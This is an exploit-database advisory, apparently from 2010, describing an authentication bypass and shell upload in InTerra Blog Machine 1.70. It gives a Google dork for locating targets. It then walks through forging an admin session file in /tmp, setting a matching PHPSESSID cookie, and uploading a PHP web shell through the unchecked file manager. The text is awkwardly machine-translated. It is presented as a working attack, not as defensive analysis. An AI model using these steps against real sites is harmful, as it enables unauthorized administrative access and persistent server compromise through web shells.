InTerra Blog Machine <= 1.70 Shell Upload Vulnerability

2010.03.07
Credit: inj3ct0r
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

======================================================= InTerra Blog Machine <= 1.70 Shell Upload Vulnerability ======================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com Product: InTerra Blog Machine Version: 1.70 Site: Dull.ru Dork : "Powered by InTerra Blog Machine" Authorization. The substitution sesii. PHP code: //check access if(!$_SESSION['admin']){ header("Location: " . SERVER_ROOT); exit; } go to / tmp create sesiyu, 0777 law: sess_aaec41a3b692b6be0dc292e40b778595 Code: admin|b:1; And Cook hammer in your browser. PHPSESSID=aaec41a3b692b6be0dc292e40b778595 After authentication : http://127.0.0.1/interra/filemanager/ And pour shell. Checks not (: lib \ uploader.class.php PHP code: function copyFile($name,$destination){ if(!$result = move_uploaded_file($name,$destination)){ $result = copy($name,$destination); } return $result; } http://127.0.0.1/interra/files/shell.php # ~ - [ [ : Inj3ct0r : ] ]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top